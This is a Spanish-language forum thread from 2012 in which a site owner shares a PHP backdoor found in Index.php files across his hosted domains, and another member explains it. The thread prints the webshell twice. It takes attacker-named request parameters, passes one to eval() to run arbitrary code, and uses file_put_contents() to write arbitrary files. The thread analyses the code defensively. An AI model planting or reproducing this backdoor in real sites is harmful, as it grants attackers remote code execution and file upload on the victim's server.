¿Código maliciosos?... Lo encontré en mi SERVER "/

Iniciado por NetStorm, 13 Diciembre 2012, 16:15 PM

0 Miembros y 1 Visitante están viendo este tema.

NetStorm

Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

<?php       
                                                                                                                                                                                                                                                                                                                                                                 
if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa $_REQUEST['pmhoc_pkkp']; $fjy_qgk $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk$ytyye_fpbqa); }

?>


El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor. 

¿Sus opiniones? :huh:

Shell Root

#1
Código (php,4,9) [Seleccionar]
<?php
if (isset($_REQUEST['gnobkr_galuh'])) {
    
$hklp_mrzpfa $_REQUEST['gnobkr_galuh'];
    eval(
$hklp_mrzpfa);
}
if (isset(
$_REQUEST['wzv_ttbhhc'])) {
    
$ytyye_fpbqa $_REQUEST['pmhoc_pkkp'];
    
$fjy_qgk     $_REQUEST['wzv_ttbhhc'];
    
file_put_contents($fjy_qgk$ytyye_fpbqa);


Quizás ya que ejecuta la función eval(), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents()
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

NetStorm

Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.

TEMA CERRADO!

Gracias